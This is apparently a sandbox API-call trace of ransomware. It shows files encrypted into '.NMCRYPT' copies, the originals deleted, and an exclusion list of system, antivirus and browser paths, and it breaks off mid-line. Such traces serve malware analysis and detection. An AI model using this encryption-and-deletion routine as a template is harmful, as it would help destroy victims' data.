[0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.475] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.476] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.476] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0146.476] CryptHashData (hHash=0x9ad238, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.476] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad1b8) returned 1 [0146.476] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.476] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.476] wcslen (_String="\\\\?\\") returned 0x4 [0146.476] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0146.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.477] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2578) returned 1 [0146.477] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.478] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.479] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.479] GetLastError () returned 0x0 [0146.479] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.377] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.378] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.378] GetLastError () returned 0x0 [0147.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.379] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.379] GetLastError () returned 0x0 [0147.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.379] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.379] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.379] GetLastError () returned 0x0 [0147.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.379] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.379] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.379] GetLastError () returned 0x0 [0147.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.379] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x12, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x12, lpOverlapped=0x0) returned 1 [0147.379] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x12, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x20) returned 1 [0147.379] GetLastError () returned 0x0 [0147.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x20, lpOverlapped=0x0) returned 1 [0147.379] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml")) returned 0x20 [0147.379] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", dwFileAttributes=0x20) returned 0 [0147.380] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned 1 [0147.380] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml")) returned 0 [0147.380] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" [0147.380] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.380] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB28D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb28d.tmp")) returned 0xb28d [0147.380] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB28D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb28d.tmp"), dwFlags=0x1) returned 0 [0147.381] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB28D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb28d.tmp")) returned 1 [0147.381] CryptDestroyKey (hKey=0x9ad138) returned 1 [0147.381] wcslen (_String="OK") returned 0x2 [0147.381] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.381] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.381] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0147.381] CryptDestroyHash (hHash=0x9ad238) returned 1 [0147.381] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0147.381] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*NMCRYPT") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*Recovers your files.html") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.exe") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.dll") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.lnk") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.bat") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.ini") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.msi") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*.scf") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*pagefile.sys*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*AppData*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\winrar\\*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\java\\*") returned 0 [0147.381] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\windows\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\ESET\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\AVG\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*Atheros*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*Realtek*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*bootmgr*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*boot*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*boot*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*IO.SYS*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*ntldr*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*chrome*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*opera*") returned 0 [0147.382] PathMatchSpecW (pszFile="ipsesp.xml", pszSpec="*firefox*") returned 0 [0147.382] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", pszSpec="*") returned 1 [0147.382] strlen (_Str="NMoreira") returned 0x8 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.382] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 